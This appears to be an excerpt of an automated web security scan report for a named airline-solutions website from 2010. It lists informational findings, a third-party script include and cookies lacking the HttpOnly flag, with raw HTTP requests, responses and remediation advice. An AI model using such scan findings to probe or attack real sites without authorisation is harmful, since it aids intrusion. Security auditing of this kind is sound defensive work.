           <a href="http://phx.corporate-ir.net/phoenix.zhtml?c=73098&p=irol-newsArticle&ID=1474241&highlight=" target="_blank">TRIP Linhas A..reas selects SabreSonic CSS reservations system, Sabre operations solutions</a>
...[SNIP]...
<br />
           <a href="http://phx.corporate-ir.net/phoenix.zhtml?c=73098&p=irol-newsArticle&ID=1465117&highlight=" target="_blank">Airphil Express stays with Sabre for rebirth and growth</a>
...[SNIP]...
<br />
           <a href="http://www.sabre-holdings.com/newsroom/pdfs/Sam-Gilliland-NBTA-2010.pdf" target="_blank"><strong>
...[SNIP]...
<br />
                   <a href="http://www.sabre-events.com/2010-airvision-design-conference">AirVision Design Conference - London England</a>
...[SNIP]...
<p>Committed to minimizing the environmental impact of our global operations and to promoting sustainable business practices in travel and tourism. <a href="http://www.sabre-holdings.com/aboutUs/corporate/sustainability.html">www.sabre-holdings.com</a>
...[SNIP]...
<p>Get online access to all the product resources you need with the <a href="http://community.sabre.com"><em>
...[SNIP]...
<li id="careers"><a href="http://sabre-holdings.com/careers/index.html">Careers</a>
...[SNIP]...
<li id="holdings"><a href="http://www.sabre-holdings.com">Sabre Holdings</a>
...[SNIP]...

8. Cross-domain script include

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabreairlinesolutions.com
Path:   /home/search/show_results

Issue detail

The response dynamically includes the following script from another domain:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

Request

GET /home/search/show_results HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 16:12:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286313150; expires=Wed, 05-Oct-2011 16:12:31 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 16:12:42 GMT
Pragma: no-cache
Content-Length: 5414
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/afsonline/show_afs_search.js"></script>
...[SNIP]...

9. Cookie without HttpOnly flag set
There are 215 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



9.1. http://www.sabreairlinesolutions.com/home

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabreairlinesolutions.com
Path:   /home

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=970953067; __utmc=178985382; exp_last_